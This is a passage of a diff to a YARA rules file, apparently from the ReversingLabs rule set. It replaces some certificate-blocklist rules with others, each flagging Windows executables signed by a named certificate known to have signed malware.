+		id = "cc147c06-e0cf-5536-be3c-17e838b346a9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11632-L11648"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5636-L5652"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0a2acf8528a12fd05cf58c2ed5224f7472d14251b342ce4df6d9c10c6a6decfc"
+		logic_hash = "d4edbb446a51e5153ba88d6757d5fb610303eac3fd4bdd3b987b508dc618d2dc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22661,21 +45055,21 @@ rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" and 1666742400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" and 1603130510 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D627F1000D12485995514Bfbdefc55D9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "98a8f4b0-08d0-5e09-b46e-74b46f4df223"
+		id = "4696fc12-16b7-575f-b90f-aa0a5cc12852"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11650-L11666"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5654-L5672"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8af5f4abe6425713b7c1fd17deaa78b2cfd6ef73ad960bce883e95661c2dbb56"
+		logic_hash = "7ca590d71997879d17054a936238dd5273a52f3438d1b231a75927abfb118ffd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22685,21 +45079,21 @@ rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENS CORP" and pe.signatures [ i ] . serial == "34:d4:2e:87:1d:db:1c:92:fa:20:b5:5b:38:4e:12:59" and 1630368000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" or pe.signatures [ i ] . serial == "d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" ) and 1597622400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2abe218a-1d93-5efe-9878-4314cf9ecdf7"
+		id = "52b11933-f22c-53ea-88b7-75b3242907dd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11668-L11684"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5674-L5690"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "569db2f6d6f4da9985c57812a03f91bce88f2150b17659249e0f746a0d15150b"
+		logic_hash = "a8cec0479bfd53f34e291d56538187c05375e80d20af7f0af08f0db8e1d6ed22"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22709,21 +45103,21 @@ rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Dibies" and pe.signatures [ i ] . serial == "08:d4:dc:90:04:7b:84:70:cc:af:39:24:df:bd:8b:5f" and 1619136000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" and 1600781989 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E5Ad42C509A7C24605530D35832C091E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "135d638c-9ee5-52cf-a6e7-c12e4feef594"
+		id = "29b1803e-90ee-5390-9548-20b24a3de218"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11686-L11704"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5692-L5710"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "836cec8d8396680dd64f95d4dd41f7f5876cb4268d983238a01d2e0990cce74a"
+		logic_hash = "2d57d1c171734d0da167ce7eba47aecd88cd15063488d79659804c6c2fae00a2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22733,21 +45127,21 @@ rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and ( pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" or pe.signatures [ i ] . serial == "c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" ) and 1602201600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and ( pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" or pe.signatures [ i ] . serial == "e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" ) and 1600786458 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8E3D89C682F7C0Dad70110Cb7B7C8263 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "80e92980-f4eb-5ac2-9f68-14c352758791"
+		id = "1adc776c-1549-5149-bd2f-81920a8d7255"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11706-L11722"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5712-L5730"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "81c9c1d841d4aae3de229cc499ee84920d89928590a3eb157f7a7a7fbc46b4a8"
+		logic_hash = "a0f42c5492469e7f132b000aead2d674fed4ea9c0e168579fd55a6c89b45ae4d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22757,21 +45151,21 @@ rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CODE - HANDLE, s. r. o." and pe.signatures [ i ] . serial == "54:c7:93:d2:22:4b:dd:6c:a5:27:bb:2b:7b:9d:fe:9d" and 1629676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WORK PLACEMENTS INTERNATIONAL LIMITED" and ( pe.signatures [ i ] . serial == "00:8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" or pe.signatures [ i ] . serial == "8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" ) and 1570626662 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ef2D35F2Ae82A767A16Be582Ab0D1Ba0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bde12eeb-c4f8-5da3-8493-0f94cb1bf1f7"
+		id = "dc8f49b8-fda2-510c-8374-3261e75d11a9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11724-L11742"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5732-L5750"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d6b5bca36ef492ce9b79be905c86c66d43ef38701dafeed977229034119bd00d"
+		logic_hash = "0709290aeb18bcb855518e150c2768c24ab311f5c727cdc4c40145b879ff88b6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22781,21 +45175,21 @@ rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and ( pe.signatures [ i ] . serial == "00:8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" or pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" ) and 1613088000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Workstage Limited" and ( pe.signatures [ i ] . serial == "00:ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" or pe.signatures [ i ] . serial == "ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" ) and 1567123200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_039668034826Df47E6207Ec9Daed57C3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "180f1209-7031-50fb-b1fc-3d357f2b73a1"
+		id = "c2a3477a-a4cf-586e-ba70-555cc577ab2c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11744-L11762"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5752-L5768"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e7a8f3dff77121df53d5f932f861e15208b0607ba77712f40927bc14b17a53cd"
+		logic_hash = "792860feec6e599ba22ae3869ef132cf5b7be2e0572e23503e293444fd7c382d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22805,21 +45199,21 @@ rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights \\xC3\\x84k\\xC3\\xA4slompolo Oy" and ( pe.signatures [ i ] . serial == "00:98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" or pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" ) and 1640304000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" and 1601424001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07Bb6A9D1C642C5973C16D5353B17Ca4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "acd29c6d-27ed-587a-b17c-989e69082434"
+		id = "094a02ee-394b-5989-9f73-6b942aca5500"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11764-L11782"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5770-L5786"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8c80ed4e4f77df34ff9fcc712deda4c1bbedc588f2b01d02aa705e368fb98c5e"
+		logic_hash = "b98dcd4f0ebe870a9dad55cac5b0db81be6062216337b75a74a0aff8436df57f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22829,21 +45223,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and ( pe.signatures [ i ] . serial == "00:ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" or pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" ) and 1647388800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" and 1601856001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A1Dc99E4D5264C45A5090F93242A30A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1484a28d-ce7c-506f-8cbb-73ac541a0907"
+		id = "9b85ed8d-ddda-51d0-bfac-5cdc6e4fd94f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11784-L11802"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5788-L5804"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "92f6e90bd21182bece68ac1651105f96a18c5b1497d30e0040a978e349341bdb"
+		logic_hash = "1985c9c4f4a93c3088eaec3031df93cf87a9d7ee36b94322330caf3c21982f3c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22853,21 +45247,21 @@ rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AATB ApS" and ( pe.signatures [ i ] . serial == "00:84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" or pe.signatures [ i ] . serial == "84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" ) and 1616457600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" and 1600905601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_018093Cfad72Cdf402Eecbe18B33Ec71 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eb441b57-0f28-5609-b987-157e1f026b0c"
+		id = "d9ab2e5c-a107-53c1-9b8d-b4625eed03b0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11804-L11822"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5806-L5822"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ec05c7e41e309aff00ae819c63f5bdc8e4172c611779da345efd211e48c9efb1"
+		logic_hash = "ac398ef89e691158742598777c320832a750a7410904448778afc7ef3c63c255"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22877,21 +45271,21 @@ rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Merkuri LLC" and ( pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) and 1619568000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAT11 d.o.o." and pe.signatures [ i ] . serial == "01:80:93:cf:ad:72:cd:f4:02:ee:cb:e1:8b:33:ec:71" and 1602000390 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_569E03988Af60D80Ce60728940850D9B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8a8decfe-c91a-562c-9376-462cab598373"
+		id = "a4432990-8c2f-523c-8a9d-cba578aaefc5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11824-L11840"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5824-L5842"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "79db8be7ca3ed80eb1e3a9401e8fec2b83da8b95b16789ed0b59bb7f4639a94d"
+		logic_hash = "3ea894d9e088c2123f9ec87cbf097e2275fae18cad26e926641fe64921808b1e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22901,21 +45295,21 @@ rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" and 1605052800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" or pe.signatures [ i ] . serial == "56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" ) and 1601006510 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_418F6D959A8A0F82Bef07Ceba3603E52 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8ec25296-2e51-53ec-a2f5-a25961079c27"
+		id = "ecfb72ef-04c4-55b6-b9e0-e95053e03425"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11842-L11860"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5844-L5862"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "682af8c799acaca531724c5b3184b855e64ec4531fcc333a485ba2f63331cdae"
+		logic_hash = "6c13c5e85d6e053319193d1d94f216eeec64405c86d15971419078a1ce6c8ac9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22925,21 +45319,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) and 1639872000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" or pe.signatures [ i ] . serial == "41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" ) and 1601928240 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5378C5Bbeba0D3309A35Bb47F63037F7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f4cc9c94-eb96-5380-9e12-cab5ec010ab8"
+		id = "7f367505-d7c1-5b8c-83bd-df3fec789d12"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11862-L11878"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5864-L5882"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c534ad306f85e12eca2336e998120deb4ba8d0d63b8331986ec7fe4ac69ba65a"
+		logic_hash = "a96acf93ca6da4d3bf5177b51996825cd3ea70443577622deccdd11fde579c31"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22949,21 +45343,21 @@ rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO SMART" and pe.signatures [ i ] . serial == "3c:98:b6:87:2f:bb:1f:4a:e3:7a:4c:aa:74:9d:24:c2" and 1613370100 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" or pe.signatures [ i ] . serial == "53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" ) and 1601427420 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Bab6A2Aa84B495D9E554A4C42C0126D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9c6d2be7-093c-5ce2-83af-6ab9b46603bc"
+		id = "7b6d364c-3e27-5314-b604-d44bb408fc4e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11880-L11898"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5884-L5900"
